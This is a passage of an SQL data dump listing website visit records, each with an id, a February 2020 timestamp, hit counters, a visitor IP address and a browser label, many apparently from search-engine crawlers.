50,1,1,0,0,'178.154.171.134','other'),(478851,1580908531,2,1,1,0,'207.46.13.231',''),(478852,1580908958,1,1,0,0,'31.13.103.10','other'),(478853,1580908960,1,1,0,0,'31.13.103.7','other'),(478854,1580908965,2,1,1,0,'66.249.64.27',''),(478855,1580909851,1,1,0,0,'178.154.171.134','other'),(478856,1580909905,1,1,0,0,'207.46.13.231','other'),(478857,1580909959,9,9,0,0,'107.175.156.144','other'),(478858,1580910494,1,1,0,0,'94.100.213.225','chrome'),(478859,1580910987,2,2,0,0,'207.46.13.9','other'),(478860,1580911251,1,1,0,0,'178.154.171.134','other'),(478861,1580911263,5,5,0,0,'207.46.13.231','other'),(478862,1580911567,1,1,0,0,'213.180.203.75','other'),(478863,1580911736,2,2,0,0,'31.148.134.113','firefox'),(478864,1580912156,1,1,0,0,'52.87.249.231','other'),(478865,1580912310,1,1,0,0,'3.80.139.202','other'),(478866,1580912495,3,0,3,0,'66.249.64.27',''),(478867,1580912575,1,1,0,0,'91.196.178.76','chrome'),(478868,1580912660,1,1,0,0,'31.148.134.113','firefox'),(478869,1580912919,1,0,1,0,'66.249.64.28',''),(478870,1580912921,5,0,5,0,'66.249.64.26',''),(478871,1580913208,1,1,0,0,'211.236.192.230','msie'),(478872,1580913982,3,0,3,0,'66.249.64.27',''),(478873,1580914496,4,0,4,0,'66.249.64.26',''),(478874,1580915041,1,1,0,0,'207.46.13.45','other'),(478875,1580915099,1,0,1,0,'66.249.64.28',''),(478876,1580915260,1,1,0,0,'8.29.198.26','other'),(478877,1580915462,1,1,0,0,'207.46.13.231','other'),(478878,1580915658,1,1,0,0,'141.8.142.2','other'),(478879,1580915714,1,1,0,0,'91.196.178.87','firefox'),(478880,1580915947,2,1,1,0,'66.249.64.27',''),(478881,1580916085,1,1,0,0,'194.0.148.100','chrome'),(478882,1580916679,3,0,3,0,'66.249.64.26',''),(478883,1580917163,1,1,0,0,'8.29.198.26','other'),(478884,1580917208,1,0,1,0,'66.249.64.27',''),(478885,1580917295,5,1,4,0,'66.249.64.27',''),(478886,1580917768,5,0,5,0,'66.249.64.26',''),(478887,1580917836,1,1,0,0,'194.0.148.100','chrome'),(478888,1580918213,2,0,2,0,'66.249.64.27',''),(478889,1580918233,1,1,0,0,'212.1.108.150','chrome'),(478890,1580918235,1,1,0,0,'198.108.66.112','other'),(478891,1580918579,1,0,1,0,'66.249.64.28',''),(478892,1580918663,1,1,0,0,'178.154.171.127','other'),(478893,1580918778,3,3,0,0,'178.154.171.134','other'),(478894,1580919039,1,0,1,0,'66.249.64.26',''),(478895,1580919464,2,2,0,0,'207.46.13.9','other'),(478896,1580919945,1,1,0,0,'178.154.171.134','other'),(478897,1580920119,1,1,0,0,'178.154.171.127','other'),(478898,1580921594,1,1,0,0,'78.106.209.243','other'),(478899,1580922912,1,1,0,0,'178.154.171.134','other'),(478900,1580923109,1,1,0,0,'178.154.171.127','other'),(478901,1580923764,5,5,0,0,'207.46.13.45','other'),(478902,1580924206,1,1,0,0,'41.210.1.230','msie'),(478903,1580924596,2,2,0,0,'178.154.171.134','other'),(478905,1580924642,3,3,0,0,'207.46.13.231','other'),(478906,1580924740,1,1,0,0,'178.154.171.127','other'),(478907,1580925678,1,1,0,0,'207.46.13.9','other'),(478908,1580925886,1,1,0,0,'66.249.64.26','chrome'),(478909,1580926009,1,1,0,0,'207.46.13.231','other'),(478910,1580926237,1,1,0,0,'178.154.171.127','other'),(478911,1580926441,1,1,0,0,'8.29.198.27','other'),(478912,1580926856,1,1,0,0,'52.87.155.116','other'),(478913,1580927189,1,1,0,0,'207.46.13.116','other'),(478914,1580928002,1,1,0,0,'66.249.64.28','chrome'),(478915,1580928210,1,1,0,0,'8.29.198.26','other'),(478916,1580928405,1,1,0,0,'207.46.13.231','other'),(478917,1580929123,2,1,1,0,'66.249.64.26',''),(478918,1580929513,1,1,0,0,'178.154.171.134','other'),(478919,1580930130,2,2,0,0,'207.46.13.116','other'),(478920,1580930174,2,2,0,0,'66.249.64.26','chrome'),(478921,1580930189,2,2,0,0,'207.46.13.100','other'),(478922,1580931793,1,1,0,0,'88.99.2.203','other'),(478924,1580931850,7,7,0,0,'136.243.70.68','other'),(478925,1580932118,1,1,0,0,'207.46.13.116','other'),(478926,1580932666,1,1,0,0,'207.46.13.100','other'),(478927,1580933630,2,2,0,0,'207.46.13.116','other'),(478928,1580933641,1,1,0,0,'207.46.13.100','other'),(478929,1580934447,1,1,0,0,'141.8.142.2','other'),(478930,1580934812,1,1,0,0,'207.46.13.116','other'),(478931,1580935496,1,0,1,0,'66.249.70.36',''),(478932,1580936557,1,1,0,0,'207.46.13.116','other'),(478933,1580936860,1,1,0,0,'207.46.13.100','other'),(478934,1580937177,1,1,0,0,'66.249.64.26','chrome'),(478935,1580937658,1,1,0,0,'8.29.198.27','other'),(478936,1580938562,1,1,0,0,'178.154.171.134','other'),(478937,1580938602,1,1,0,0,'185.183.96.122','chrome'),(478938,1580939180,1,1,0,0,'207.46.13.100','other'),(478939,1580939300,1,1,0,0,'8.29.198.25','other'),(478940,1580940108,1,1,0,0,'178.154.171.127','other'),(478941,1580940223,1,1,0,0,'103.86.50.211','firefox'),(478942,1580940284,1,1,0,0,'178.154.171.134','other'),(478943,1580941511,3,3,0,0,'207.46.13.116','other'),(478944,1580942054,2,2,0,0,'178.154.171.127','other'),(478945,1580942521,1,1,0,0,'207.46.13.100','other'),(478946,1580942712,1,1,0,0,'70.42.131.189','msie'),(478947,1580942868,1,1,0,0,'178.154.171.134','other'),(478948,1580943075,2,2,0,0,'207.46.13.116','other'),(478949,1580944197,2,2,0,0,'207.46.13.100','other'),(478950,1580944387,1,1,0,0,'78.47.40.121','chrome'),(478951,1580944399,1,1,0,0,'207.46.13.116','other'),(478952,1580945089,2,1,1,0,'66.249.64.28',''),(478953,1580945378,1,1,0,0,'66.249.64.27','chrome'),(478954,1580945762,1,1,0,0,'46.4.33.48','other'),(478955,1580945817,1,0,1,0,'157.55.39.158',''),(478956,1580946125,1,0,1,0,'207.46.13.100',''),(478957,1580946126,2,2,0,0,'207.46.13.100','other'),(478958,1580946451,1,1,0,0,'178.154.171.134','other'),(478959,1580947419,1,1,0,0,'141.8.142.2','other'),(478960,1580947594,2,2,0,0,'207.46.13.116','other'),(478961,1580947780,2,2,0,0,'178.154.171.134','other'),(478962,1580948190,2,2,0,0,'207.46.13.100','other'),(478963,1580948335,1,1,0,0,'178.154.171.127','other'),(478964,1580948794,1,1,0,0,'8.29.198.27','other'),(478965,1580949483,1,1,0,0,'178.154.171.127','other'),(478966,1580950078,3,2,1,0,'207.46.13.116',''),(478967,1580950189,1,1,0,0,'178.154.171.134','other'),(478968,1580950317,1,1,0,0,'8.29.198.25','other'),(478969,1580950470,1,1,0,0,'178.154.171.127','other'),(478970,1580950514,1,1,0,0,'62.205.134.182','other'),(478971,1580951323,2,2,0,0,'207.46.13.100','other'),(478972,1580952175,1,0,1,0,'207.46.13.116',''),(478973,1580952343,1,1,0,0,'207.46.13.100','other'),(478974,1580952701,2,1,1,0,'207.46.13.116',''),(478975,1580952800,1,1,0,0,'178.154.171.134','other'),(478976,1580956281,2,2,0,0,'178.154.171.127','other'),(478977,1580956641,1,0,1,0,'207.46.13.8',''),(478978,1580958749,1,1,0,0,'178.154.171.134','other'),(478979,1580959899,1,1,0,0,'8.29.198.26','other'),(478980,1580960499,1,1,0,0,'178.154.171.134','other'),(478981,1580960527,1,1,0,0,'178.154.171.127','other'),(478982,1580961329,1,1,0,0,'8.29.198.26','other'),(478983,1580961506,1,0,1,0,'207.46.13.192',''),(478984,1580961889,1,1,0,0,'54.184.17.27','chrome'),(478985,1580961893,1,1,0,0,'52.34.24.33','other'),(478986,1580962606,1,1,0,0,'178.154.171.134','other'),(478987,1580963390,1,0,1,0,'207.46.13.197',''),(478988,1580963582,1,1,0,0,'91.196.178.141','firefox'),(478989,1580964370,1,1,0,0,'51.68.152.26','chrome'),(478990,1580964596,1,0,1,0,'66.249.64.27',''),(478991,1580964615,1,1,0,0,'66.249.64.26','chrome'),(478992,1580965391,1,1,0,0,'207.46.13.62','other'),(478993,1580965850,1,1,0,0,'207.46.13.116','other'),(478994,1580967803,1,1,0,0,'62.205.134.182','other'),(478995,1580967925,1,1,0,0,'66.249.64.28','chrome'),(478996,1580968689,1,1,0,0,'207.46.13.116','other'),(478997,1580969797,1,1,0,0,'207.46.13.62','other'),(478998,1580970191,1,1,0,0,'207.46.13.116','other'),(478999,1580970749,1,1,0,0,'89.163.242.241','opera'),(479000,1580970952,1,1,0,0,'8.29.198.25','other'),(479001,1580971521,1,1,0,0,'207.46.13.116','other'),(479002,1580972342,1,1,0,0,'8.29.198.26','other'),(479003,1580972706,1,0,1,0,'207.46.13.96',''),(479004,1580973484,1,1,0,0,'66.249.64.27','chrome'),(479005,1580973499,2,1,1,0,'207.46.13.62',''),(479006,1580973747,1,1,0,0,'207.46.13.116','other'),(479007,1580974835,2,2,0,0,'207.46.13.62','other'),(479008,1580975975,2,2,0,0,'207.46.13.116','other'),(479009,1580976069,1,1,0,0,'195.114.147.203','chrome'),(479010,1580976077,1,1,0,0,'207.46.13.62','other'),(479011,1580976409,1,1,0,0,'176.104.1.246','firefox'),(479012,1580977363,1,1,0,0,'207.46.13.116','other'),(479013,1580977373,1,1,0,0,'207.46.13.62','other'),(479014,1580977523,1,1,0,0,'66.249.64.28','chrome'),(479015,1580978141,1,1,0,0,'128.124.161.125','chrome'),(479016,1580979040,1,1,0,0,'91.196.178.114','chrome'),(479017,1580979988,1,1,0,0,'31.13.127.22','other'),(479018,1580979990,1,1,0,0,'31.13.115.18','other'),(479019,1580980040,2,2,0,0,'207.46.13.116','other'),(479020,1580981003,1,1,0,0,'173.252.127.11','other'),(479021,1580981315,1,1,0,0,'91.196.178.114','chrome'),(479022,1580982012,1,1,0,0,'8.29.198.26','other'),(479023,1580982087,2,2,0,0,'207.46.13.62','other'),(479024,1580982242,1,1,0,0,'91.196.177.46','chrome'),(479025,1580983342,1,1,0,0,'8.29.198.27','other'),(479026,1580983463,1,0,1,0,'207.46.13.62',''),(479027,1580984256,1,1,0,0,'3.219.29.228','chrome'),(479028,1580984317,1,1,0,0,'207.46.13.62','other'),(479029,1580984931,2,2,0,0,'207.46.13.116','other'),(479030,1580986249,1,1,0,0,'82.207.24.175','chrome'),(479031,1580986753,1,1,0,0,'207.46.13.62','other'),(479032,1580986817,1,1,0,0,'109.74.154.72','chrome'),(479033,1580988191,1,0,1,0,'207.46.13.114',''),(479034,1580988927,1,1,0,0,'91.196.178.82','chrome'),(479035,1580988996,1,1,0,0,'194.187.171.138','other'),(479036,1580990095,1,1,0,0,'193.104.213.239','firefox'),(479037,1580991174,1,1,0,0,'66.249.64.27','chrome'),(479038,1580991449,1,1,0,0,'207.46.13.62','other'),(479039,1580992635,1,1,0,0,'66.249.70.62','chrome'),(479040,1580992640,1,0,1,0,'66.249.64.27',''),(479041,1580993023,1,1,0,0,'31.13.127.2','other'),(479042,1580993024,2,2,0,0,'31.13.127.19','other'),(479044,1580993132,1,1,0,0,'8.29.198.27','other'),(479045,1580993561,1,1,0,0,'95.216.96.243','other'),(479046,1580994102,1,0,1,0,'66.249.64.26',''),(479047,1580994358,1,1,0,0,'8.29.198.26','other'),(479048,1580994584,1,1,0,0,'91.106.199.104','other'),(479049,1580994784,1,1,0,0,'92.112.154.215','firefox'),(479050,1580994870,1,1,0,0,'207.46.13.116','other'),(479051,1580994875,1,1,0,0,'207.46.13.62','other'),(479052,1580994970,1,1,0,0,'212.1.108.150','chrome'),(479053,1580995543,1,1,0,0,'192.151.157.210','other'),(479054,1580995615,1,1,0,0,'66.249.64.28','chrome'),(479055,1580995620,1,0,1,0,'66.249.64.27',''),(479056,1580995759,167,167,0,0,'198.204.243.138','other'),(479057,1580995835,1,1,0,0,'178.92.227.247','opera'),(479058,1580996662,60,60,0,0,'198.204.243.138','other'),(479059,1580996744,1,1,0,0,'66.249.64.26','chrome'),(479060,1580997715,1,1,0,0,'52.221.203.250','firefox'),(479061,1580997823,1,0,1,0,'207.46.13.62',''),(479062,1580997843,2,2,0,0,'66.249.64.27','chrome'),(479063,1580997893,1,0,1,0,'66.249.64.26',''),(479064,1580998861,1,1,0,0,'207.46.13.62','other'),(479065,1580998966,1,1,0,0,'207.46.13.116','other'),(479066,1580999497,1,1,0,0,'107.178.194.168','chrome'),(479067,1580999789,1,1,0,0,'89.163.242.241','opera'),(479068,1580999958,1,1,0,0,'66.249.64.28','chrome'),(479069,1581000109,1,1,0,0,'91.196.178.167','chrome'),(479070,1581000174,1,1,0,0,'37.9.113.10','other'),(479071,1581000303,1,1,0,0,'82.207.91.234','other'),(479072,1581001207,1,1,0,0,'141.8.142.164','other'),(479073,1581001448,1,1,0,0,'207.46.13.189','other'),(479074,1581001698,2,2,0,0,'88.99.2.203','other'),(479075,1581001748,1,1,0,0,'141.8.142.119','other'),(479076,1581001749,7,7,0,0,'136.243.70.68','other'),(479077,1581002033,1,1,0,0,'91.196.177.15','chrome'),(479078,1581002548,1,1,0,0,'141.8.183.73','other'),(479079,1581002550,1,1,0,0,'207.46.13.99','other'),(479080,1581002826,1,1,0,0,'188.163.37.180','opera'),(479081,1581002939,1,1,0,0,'178.154.171.134','other'),(479082,1581004163,1,1,0,0,'91.196.177.15','chrome'),(479083,1581004175,3,3,0,0,'207.46.13.99','other'),(479084,1581004312,1,1,0,0,'207.46.13.62','other'),(479085,1581004431,1,1,0,0,'8.29.198.27','other'),(479086,1581004522,1,1,0,0,'66.249.64.27','chrome'),(479087,1581004584,5,5,0,0,'207.46.13.116','other'),(479088,1581004729,1,1,0,0,'66.249.70.62','chrome'),(479089,1581005188,2,2,0,0,'91.196.177.15','chrome'),(479090,1581005306,1,1,0,0,'185.226.145.113','chrome'),(479091,1581005327,1,1,0,0,'45.152.33.140','chrome'),(479092,1581005458,1,1,0,0,'8.29.198.25','other'),(479093,1581006315,1,1,0,0,'91.196.177.15','chrome'),(479094,1581006996,1,1,0,0,'178.154.171.134','other'),(479095,1581007153,1,1,0,0,'91.196.178.91','chrome'),(479096,1581007497,2,0,2,0,'66.249.64.28',''),(479097,1581008446,1,1,0,0,'207.46.13.116','other'),(479098,1581008497,1,1,0,0,'141.8.142.2','other'),(479099,1581009097,1,1,0,0,'66.249.64.28','chrome'),(479100,1581010185,1,1,0,0,'66.249.70.36','chrome'),(479101,1581010359,1,1,0,0,'91.196.121.158','chrome'),(479102,1581011650,1,1,0,0,'207.46.13.62','other'),(479103,1581011654,1,1,0,0,'207.46.13.116','other'),(479104,1581012294,1,1,0,0,'31.13.115.24','other'),(479105,1581012296,1,1,0,0,'31.13.115.4','other'),(479106,1581012344,1,1,0,0,'188.163.37.180','msie'),(479107,1581012798,1,1,0,0,'66.249.64.26','chrome'),(479108,1581012819,2,2,0,0,'178.154.171.134','other'),(479109,1581013132,1,1,0,0,'141.8.183.73','other'),(479110,1581013968,1,1,0,0,'141.8.142.2','other'),(479111,1581014147,1,1,0,0,'178.154.171.134','other'),(479112,1581014548,2,2,0,0,'66.249.64.28','chrome'),(479113,1581015355,2,2,0,0,'207.46.13.62','other'),(479114,1581015679,1,1,0,0,'8.29.198.26','other'),(479115,1581016366,1,1,0,0,'91.122.30.68','chrome'),(479116,1581016481,1,1,0,0,'141.8.142.115','other'),(479117,1581016808,1,1,0,0,'8.29.198.26','other'),(479118,1581016812,1,1,0,0,'141.8.142.2','other'),(479119,1581017463,1,1,0,0,'207.46.13.62','other'),(479120,1581017561,1,1,0,0,'157.55.39.201','other'),(479121,1581017590,1,1,0,0,'37.9.113.10','other'),(479122,1581018008,1,1,0,0,'178.154.171.134','other'),(479123,1581019709,1,1,0,0,'141.8.142.119','other'),(479124,1581019907,1,1,0,0,'91.196.178.121','chrome'),(479125,1581020026,1,1,0,0,'207.46.13.62','other'),(479126,1581020873,1,1,0,0,'178.154.171.134','other'),(479127,1581020981,2,2,0,0,'207.46.13.116','other'),(479128,1581021294,1,1,0,0,'91.196.178.168','chrome'),(479129,1581021296,2,2,0,0,'66.102.8.92','chrome'),(479130,1581021309,1,1,0,0,'66.102.8.90','chrome'),(479132,1581021853,1,1,0,0,'141.8.142.119','other'),(479133,1581023083,1,1,0,0,'207.46.13.62','other'),(479134,1581023662,2,0,2,0,'207.46.13.116',''),(479135,1581024275,1,1,0,0,'207.46.13.116','other'),(479136,1581025380,1,1,0,0,'207.46.13.116','other'),(479137,1581026006,1,1,0,0,'178.154.171.134','other'),(479138,1581026926,1,1,0,0,'8.29.198.26','other'),(479139,1581027881,1,1,0,0,'8.29.198.25','other'),(479140,1581028622,1,1,0,0,'178.154.171.134','other'),(479141,1581028974,62,62,0,0,'173.212.229.76','other'),(479142,1581029882,51,51,0,0,'173.212.229.76','other'),(479143,1581030485,2,2,0,0,'178.154.171.127','other'),(479144,1581030785,41,41,0,0,'173.212.229.76','other'),(479145,1581031023,39,39,0,0,'149.202.82.11','other'),(479146,1581031661,1,1,0,0,'178.154.171.127','other'),(479147,1581031741,1,1,0,0,'178.154.171.134','other'),(479148,1581031925,63,63,0,0,'149.202.82.11','other'),(479149,1581032397,1,1,0,0,'195.128.17.206','other'),(479150,1581032831,65,65,0,0,'149.202.82.11','other'),(479151,1581032979,1,1,0,0,'66.249.64.27','chrome'),(479152,1581033242,1,1,0,0,'173.212.229.76','other'),(479153,1581033878,1,1,0,0,'178.154.171.134','other'),(479154,1581033920,1,1,0,0,'178.154.171.127','other'),(479155,1581034378,1,1,0,0,'141.8.142.2','other'),(479156,1581035580,1,1,0,0,'66.249.64.28','chrome'),(479157,1581035590,2,2,0,0,'66.249.64.26','chrome'),(479158,1581035817,1,1,0,0,'66.249.70.62','chrome'),(479159,1581036041,1,1,0,0,'207.46.13.116','other'),(479160,1581036913,1,1,0,0,'62.205.134.182','other'),(479161,1581037030,2,2,0,0,'178.154.171.134','other'),(479162,1581037691,1,1,0,0,'138.246.253.5','chrome'),(479163,1581038063,1,1,0,0,'8.29.198.27','other'),(479164,1581038105,1,1,0,0,'66.249.64.26','chrome'),(479165,1581038504,2,2,0,0,'178.154.171.134','other'),(479166,1581038996,1,1,0,0,'8.29.198.27','other'),(479167,1581039984,1,1,0,0,'178.154.171.134','other'),(479168,1581040110,2,1,1,0,'66.249.64.27',''),(479169,1581040307,1,1,0,0,'207.46.13.62','other'),(479170,1581040343,1,1,0,0,'157.55.39.92','other'),(479171,1581040894,1,1,0,0,'66.249.64.28','chrome'),(479172,1581042743,1,0,1,0,'157.55.39.92',''),(479173,1581043056,1,1,0,0,'66.249.64.27','chrome'),(479174,1581043135,2,2,0,0,'82.202.204.118','chrome'),(479175,1581044043,2,2,0,0,'178.154.171.134','other'),(479176,1581044147,1,1,0,0,'213.159.213.236','other'),(479177,1581044163,1,1,0,0,'87.250.224.90','other'),(479178,1581044531,1,1,0,0,'178.154.171.127','other'),(479179,1581044706,1,1,0,0,'66.249.64.28','chrome'),(479180,1581044714,1,1,0,0,'66.249.64.27','chrome'),(479181,1581044871,1,1,0,0,'66.249.64.26','chrome'),(479182,1581045390,1,1,0,0,'207.46.13.116','other'),(479183,1581046450,2,2,0,0,'178.154.171.127','other'),(479184,1581047306,2,2,0,0,'207.46.13.116','other'),(479185,1581048161,1,1,0,0,'66.249.64.26','chrome'),(479186,1581048982,1,1,0,0,'52.43.73.170','chrome'),(479187,1581048985,1,1,0,0,'52.34.24.33','other'),(479188,1581049271,1,1,0,0,'8.29.198.27','other'),(479189,1581049643,1,1,0,0,'66.249.64.28','chrome'),(479190,1581049992,1,1,0,0,'8.29.198.25','other'),(479191,1581050593,1,1,0,0,'207.46.13.116','other'),(479192,1581052520,1,1,0,0,'178.154.171.134','other'),(479193,1581053243,1,1,0,0,'178.154.171.127','other'),(479194,1581053345,1,1,0,0,'157.55.39.92','other'),(479195,1581054363,1,1,0,0,'62.205.134.182','other'),(479196,1581054553,1,0,1,0,'207.46.13.116',''),(479197,1581055083,2,2,0,0,'207.46.13.116','other'),(479198,1581057030,1,1,0,0,'141.8.183.111','other'),(479199,1581057235,1,1,0,0,'66.249.64.26','chrome'),(479200,1581057808,1,1,0,0,'207.46.13.116','other'),(479201,1581058472,1,1,0,0,'141.8.183.73','other'),(479202,1581059174,1,1,0,0,'91.196.178.76','chrome'),(479203,1581059262,1,1,0,0,'178.154.171.134','other'),(479204,1581059536,1,1,0,0,'141.8.183.111','other'),(479205,1581059648,1,1,0,0,'66.249.64.26','chrome'),(479206,1581059960,1,1,0,0,'178.154.171.127','other'),(479207,1581060116,2,2,0,0,'157.55.39.92','other'),(479208,1581060358,1,1,0,0,'8.29.198.27','other'),(479209,1581060532,1,1,0,0,'87.250.224.90','other'),(479210,1581060931,1,0,1,0,'66.249.64.26',''),(479211,1581060933,1,1,0,0,'66.249.64.27','chrome'),(479212,1581060991,1,1,0,0,'8.29.198.26','other'),(479213,1581061069,1,1,0,0,'91.196.178.175','chrome'),(479214,1581061247,1,1,0,0,'66.249.70.36','chrome'),(479215,1581062802,2,2,0,0,'207.46.13.116','other'),(479216,1581062814,3,3,0,0,'157.55.39.92','other'),(479217,1581063436,1,1,0,0,'178.154.171.134','other'),(479218,1581064248,2,2,0,0,'157.55.39.92','other'),(479219,1581065345,1,1,0,0,'51.89.255.196','firefox'),(479220,1581065347,1,1,0,0,'178.154.171.134','other'),(479221,1581066277,1,1,0,0,'91.196.178.76','chrome'),(479222,1581066557,1,1,0,0,'207.46.13.116','other'),(479223,1581066883,1,1,0,0,'178.154.171.134','other'),(479224,1581067112,1,1,0,0,'178.154.171.127','other'),(479225,1581067187,1,1,0,0,'93.159.230.28','chrome'),(479226,1581067438,1,1,0,0,'91.196.178.76','chrome'),(479227,1581067846,1,1,0,0,'18.204.2.220','chrome'),(479228,1581067914,1,1,0,0,'207.46.13.116','other'),(479229,1581067947,1,1,0,0,'66.249.64.26','chrome'),(479230,1581068158,1,1,0,0,'178.154.171.127','other'),(479231,1581068406,1,1,0,0,'178.154.171.134','other'),(479232,1581069555,2,2,0,0,'178.154.171.134','other'),(479233,1581070021,4,4,0,0,'207.46.13.116','other'),(479234,1581070200,1,1,0,0,'13.57.34.77','chrome'),(479235,1581070206,1,1,0,0,'54.153.72.31','chrome'),(479236,1581070209,9,9,0,0,'52.53.177.126','chrome'),(479237,1581070824,1,1,0,0,'87.250.224.90','other'),(479238,1581070869,1,1,0,0,'178.154.171.134','other'),(479239,1581071438,1,1,0,0,'8.29.198.27','other'),(479240,1581071717,1,1,0,0,'91.196.178.177','chrome'),(479241,1581071960,1,1,0,0,'8.29.198.26','other'),(479242,1581072167,1,1,0,0,'66.249.64.27','chrome'),(479243,1581072447,2,2,0,0,'178.154.171.134','other'),(479244,1581073167,1,1,0,0,'157.55.39.92','other'),(479245,1581073232,1,1,0,0,'86.185.206.44','chrome'),(479246,1581073996,1,1,0,0,'23.100.18.115','firefox'),(479247,1581074173,1,1,0,0,'178.154.171.134','other'),(479248,1581074224,1,1,0,0,'178.133.172.62','chrome'),(479249,1581074941,1,1,0,0,'157.55.39.92','other'),(479250,1581075047,1,1,0,0,'109.74.154.72','chrome'),(479251,1581075062,2,2,0,0,'207.46.13.116','other'),(479252,1581075661,2,2,0,0,'178.154.171.127','other'),(479253,1581075988,1,1,0,0,'141.8.183.73','other'),(479254,1581077327,1,1,0,0,'141.8.183.73','other'),(479255,1581077587,1,1,0,0,'91.196.178.177','chrome'),(479256,1581077617,2,2,0,0,'178.154.171.127','other'),(479257,1581077722,2,2,0,0,'178.154.171.134','other'),(479258,1581077973,1,1,0,0,'23.100.18.115','firefox'),(479259,1581079509,1,1,0,0,'207.46.13.116','other'),(479260,1581079625,1,1,0,0,'92.124.153.239','chrome'),(479261,1581079650,1,1,0,0,'157.55.39.92','other'),(479262,1581079934,1,1,0,0,'77.123.83.71','chrome'),(479263,1581079975,1,1,0,0,'212.1.108.150','msie'),(479264,1581079982,1,1,0,0,'212.1.108.150','chrome'),(479265,1581080124,1,1,0,0,'17.58.101.25','other'),(479266,1581080282,1,1,0,0,'91.196.178.142','chrome'),(479267,1581080995,1,1,0,0,'178.154.171.134','other'),(479268,1581081300,1,1,0,0,'157.55.39.92','other'),(479269,1581082370,1,1,0,0,'157.55.39.92','other'),(479270,1581082382,1,1,0,0,'141.101.23.83','chrome'),(479271,1581082532,1,1,0,0,'8.29.198.26','other'),(479272,1581082723,1,1,0,0,'157.230.111.113','chrome'),(479273,1581082948,1,1,0,0,'8.29.198.25','other'),(479274,1581083901,1,1,0,0,'178.154.171.134','other'),(479275,1581084829,1,1,0,0,'207.46.13.116','other'),(479276,1581086044,1,1,0,0,'66.249.64.26','chrome'),(479277,1581086438,1,1,0,0,'91.196.177.15','chrome'),(479278,1581086839,1,1,0,0,'66.249.64.28','chrome'),(479279,1581086951,1,1,0,0,'178.154.171.127','other'),(479280,1581087065,1,1,0,0,'91.196.178.53','chrome'),(479281,1581087067,2,1,1,0,'66.249.64.26',''),(479282,1581087309,2,1,1,0,'66.249.64.27',''),(479283,1581087435,1,1,0,0,'91.196.177.15','chrome'),(479284,1581088612,1,1,0,0,'66.249.64.26','chrome'),(479285,1581088900,1,1,0,0,'157.55.39.92','other'),(479286,1581090153,1,1,0,0,'66.249.70.36','chrome'),(479287,1581092275,1,1,0,0,'157.55.39.92','other'),(479288,1581093565,1,1,0,0,'66.249.64.26','chrome'),(479289,1581093622,2,2,0,0,'8.29.198.27','other'),(479290,1581094103,1,1,0,0,'80.95.45.238','chrome'),(479291,1581095351,1,1,0,0,'157.55.39.92','other'),(479292,1581095714,1,1,0,0,'207.46.13.116','other'),(479293,1581096755,1,1,0,0,'207.46.13.116','other'),(479294,1581096956,1,1,0,0,'157.55.39.92','other'),(479295,1581097900,1,1,0,0,'207.46.13.116','other'),(479296,1581102350,3,3,0,0,'157.55.39.92','other'),(479297,1581102595,1,1,0,0,'66.249.70.36','chrome'),(479298,1581102635,1,1,0,0,'66.249.64.26','chrome'),(479299,1581103893,1,0,1,0,'157.55.39.92',''),(479300,1581104667,1,1,0,0,'157.55.39.92','other'),(479301,1581104709,1,1,0,0,'8.29.198.26','other'),(479302,1581104751,1,1,0,0,'178.154.171.134','other'),(479303,1581105007,1,1,0,0,'8.29.198.25','other'),(479304,1581105891,1,1,0,0,'141.8.183.73','other'),(479305,1581107091,1,1,0,0,'66.249.64.69','chrome'),(479306,1581107902,1,1,0,0,'178.154.171.134','other'),(479307,1581110049,2,2,0,0,'157.55.39.92','other'),(479308,1581111566,1,1,0,0,'141.8.132.2','other'),(479309,1581111593,1,1,0,0,'188.116.151.100','firefox'),(479310,1581111594,1,1,0,0,'188.116.151.100','other'),(479311,1581113165,1,1,0,0,'51.161.105.105','chrome'),(479312,1581113691,2,2,0,0,'69.58.178.57','other'),(479313,1581113755,1,1,0,0,'157.55.39.92','other'),(479314,1581115130,2,2,0,0,'82.202.226.49','chrome'),(479315,1581115276,2,2,0,0,'157.55.39.92','other'),(479316,1581115768,2,2,0,0,'8.29.198.25','other'),(479317,1581115833,2,2,0,0,'66.249.70.33','chrome'),(479318,1581115870,1,1,0,0,'66.249.64.28','chrome'),(479319,1581117437,1,1,0,0,'157.55.39.92','other'),(479320,1581118016,1,1,0,0,'66.249.64.28','chrome'),(479321,1581118219,1,1,0,0,'178.65.136.98','chrome'),(479322,1581118775,1,0,1,0,'207.46.13.50',''),(479323,1581118778,1,1,0,0,'207.46.13.50','other'),(479324,1581119627,21,21,0,0,'89.248.160.152','msie'),(479325,1581121155,1,1,0,0,'66.249.64.26','chrome'),(479326,1581122667,1,1,0,0,'87.250.224.90','other'),(479327,1581122674,1,1,0,0,'157.55.39.92','other'),(479328,1581122845,1,1,0,0,'66.249.64.26','chrome'),(479329,1581123313,1,1,0,0,'62.205.134.182','other'),(479330,1581126535,1,1,0,0,'157.55.39.53','other'),(479331,1581126816,1,1,0,0,'8.29.198.26','other'),(479332,1581126994,1,1,0,0,'8.29.198.25','other'),(479333,1581130897,1,1,0,0,'157.55.39.92','other'),(479334,1581131592,1,1,0,0,'5.45.207.65','other'),(479335,1581132670,1,1,0,0,'66.249.64.26','chrome'),(479336,1581134513,1,1,0,0,'18.237.85.18','chrome'),(479337,1581134517,1,1,0,0,'35.162.70.167','other'),(479338,1581136116,1,1,0,0,'141.8.132.19','other'),(479339,1581136808,1,1,0,0,'91.196.178.136','firefox'),(479340,1581137087,1,0,1,0,'66.249.64.27',''),(479341,1581137816,2,2,0,0,'8.29.198.26','other'),(479342,1581138473,1,1,0,0,'157.55.39.92','other'),(479343,1581138608,3,3,0,0,'207.46.13.50','other'),(479344,1581140139,2,2,0,0,'66.249.64.27','chrome'),(479345,1581140310,1,1,0,0,'66.249.70.36','chrome'),(479346,1581140528,2,2,0,0,'207.46.13.136','other'),(479347,1581140619,1,1,0,0,'62.205.134.182','other'),(479348,1581141028,1,1,0,0,'66.249.64.28','chrome'),(479349,1581141047,2,2,0,0,'66.249.64.26','chrome'),(479350,1581141180,1,1,0,0,'66.249.64.27','chrome'),(479351,1581141559,2,2,0,0,'207.46.13.136','other'),(479352,1581142037,2,2,0,0,'66.249.64.28','chrome'),(479353,1581142186,1,1,0,0,'141.8.142.50','other'),(479354,1581142705,1,1,0,0,'157.55.39.92','other'),(479355,1581143840,1,1,0,0,'66.249.64.27','chrome'),(479356,1581144422,1,1,0,0,'66.249.70.62','chrome'),(479357,1581144640,1,1,0,0,'66.249.70.36','chrome'),(479358,1581144797,5,5,0,0,'66.249.64.27','chrome'),(479359,1581144854,3,3,0,0,'66.249.64.26','chrome'),(479360,1581145359,1,1,0,0,'66.249.70.33','chrome'),(479361,1581145744,1,1,0,0,'66.249.64.27','chrome'),(479362,1581146079,1,1,0,0,'66.249.6